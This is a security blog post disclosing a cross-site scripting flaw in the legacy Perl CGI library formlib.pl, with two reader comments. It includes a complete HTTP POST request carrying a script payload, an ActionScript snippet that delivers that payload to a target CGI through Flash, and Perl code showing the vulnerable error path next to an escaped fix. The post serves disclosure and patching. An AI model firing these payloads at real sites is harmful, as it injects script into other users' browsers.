web application security lab

formlib.pl Vulnerable to XSS

This post will most likely be lost on most of you, but today I suddenly realized that formlib.pl is vulnerable to XSS. “What is formlib.pl?” you are probably asking yourself. It’s one of the foundations of CGI programming, one of the first things built to deal with dynamically generated webpages. It was the first CGI interface library written for PERL, before PERL was really even an object oriented language, and there is still plenty of code out there that uses it. Yup, it’s a blast from the past.

The only problem is that there are some people (like myself) who still use it, because it’s so efficient. Of course I’ve hacked it up over the years, making it more efficient and easier to use, etc… but I left in (in some form) the one vulnerable line of code:

&HtmlError("formlib.parse", "bjelli", "Error parsing $_, aborting.\n");

For those of you who can’t read PERL, $_ is Perl’s default (topic) variable; here it holds whatever input failed to parse, and HtmlError writes it straight into the error page. If you can get it to error out, you can get it to execute any JavaScript you like, as long as it doesn’t have quotes in it. Here’s a way to get it to error out:

POST /cgi-bin/vulnerable.cgi HTTP/1.1
Host: www.vulnerable-site.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.1) Gecko/20061204 Firefox/2.0.0.1
Accept: application/x-shockwave-flash,text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 300
Proxy-Connection: keep-alive
Cookie: dbx-postmeta=grabit=0-,1-,2-,3-,4-,5-,6-&advancedstuff=0-,1-,2-
Content-type: application/x-www-form-urlencoded
Content-Length: 53

<script>alert(String.fromCharCode(88,83,83))</script>

Okay, how do we do that? Well, here’s one way. ActionScript inside Flash allows us to do some pretty crazy things (I’m researching an old issue right now with Amit, which is how I found this originally).

var req:XML=new XML('<script>alert(String.fromCharCode(88,83,83))</script>');
req.send("http://www.vulnerable-site.com/cgi-bin/vulnerable.cgi", "_self");

Anyway, like I said, this is probably lost on most people, but to me it was a big deal. I found eight places on this site alone that were vulnerable. If you are an old-school PERL hacker and you haven’t upgraded from formlib.pl to something like CGI.pm (despite that module being bloat-ware), you probably should at least patch up by removing the “$_” from the script.
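To make the bug and the fix concrete, here is an added example (not formlib.pl’s own code): a minimal formlib-style parser whose error path reproduces the reflection described above, beside a hardened error path that escapes the message before it reaches the page. The parse loop, the HtmlError signatures and the escape helper are assumed reconstructions; only the error message itself comes from the post.

```perl
#!/usr/bin/perl
# Added example, not formlib.pl's own code. The parse loop and the
# HtmlError signatures are assumed reconstructions of the library's style.
use strict;
use warnings;

# Escape the five characters that matter when reflecting text into HTML.
sub html_escape {
    my ($s) = @_;
    my %map = ('&' => '&amp;', '<' => '&lt;', '>' => '&gt;',
               '"' => '&quot;', "'" => '&#39;');
    $s =~ s/([&<>"'])/$map{$1}/g;
    return $s;
}

# Vulnerable: the caller's message (which contains the unparsed $_)
# is interpolated into the HTML error page as-is.
sub HtmlError_vulnerable {
    my ($func, $tag, $msg) = @_;
    return "<html><body><h1>Error in $func</h1><p>$msg</p></body></html>";
}

# Hardened: same page, but the message is HTML-escaped first, so a
# pair like "<script>..." is rendered as text instead of executed.
sub HtmlError_safe {
    my ($func, $tag, $msg) = @_;
    return "<html><body><h1>Error in " . html_escape($func) . "</h1><p>"
         . html_escape($msg) . "</p></body></html>";
}

# formlib-style parse: split the body on '&', then each pair on '='.
# A pair with no '=' is the error case the post triggers.
sub parse_form {
    my ($body, $error_handler) = @_;
    my %form;
    foreach (split /&/, $body) {
        unless (/=/) {
            return $error_handler->("formlib.parse", "bjelli",
                                    "Error parsing $_, aborting.\n");
        }
        my ($name, $value) = split /=/, $_, 2;
        $form{$name} = $value;
    }
    return \%form;
}

# Constructed request body from the post: it contains no '=', so parsing fails
# and the body is reflected by whichever error handler is in use.
my $body = '<script>alert(String.fromCharCode(88,83,83))</script>';
print "VULNERABLE:\n", parse_form($body, \&HtmlError_vulnerable), "\n\n";
print "HARDENED:\n",   parse_form($body, \&HtmlError_safe),       "\n";
```

Dropping $_ from the message, as the post suggests, closes the hole just as well; escaping keeps the diagnostic while making it inert.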

2 Responses to “formlib.pl Vulnerable to XSS”

  1. Wladimir Palant Says:

    Ah, nice to see you XSS’ing yourself with this snippet of ActionScript code. Maybe you should escape the HTML entities there :)

  2. RSnake Says:

    Whoops, I just removed the output completely. I can’t use HTML entities because then I couldn’t enter the other HTML. Anyway, yes, I fixed it.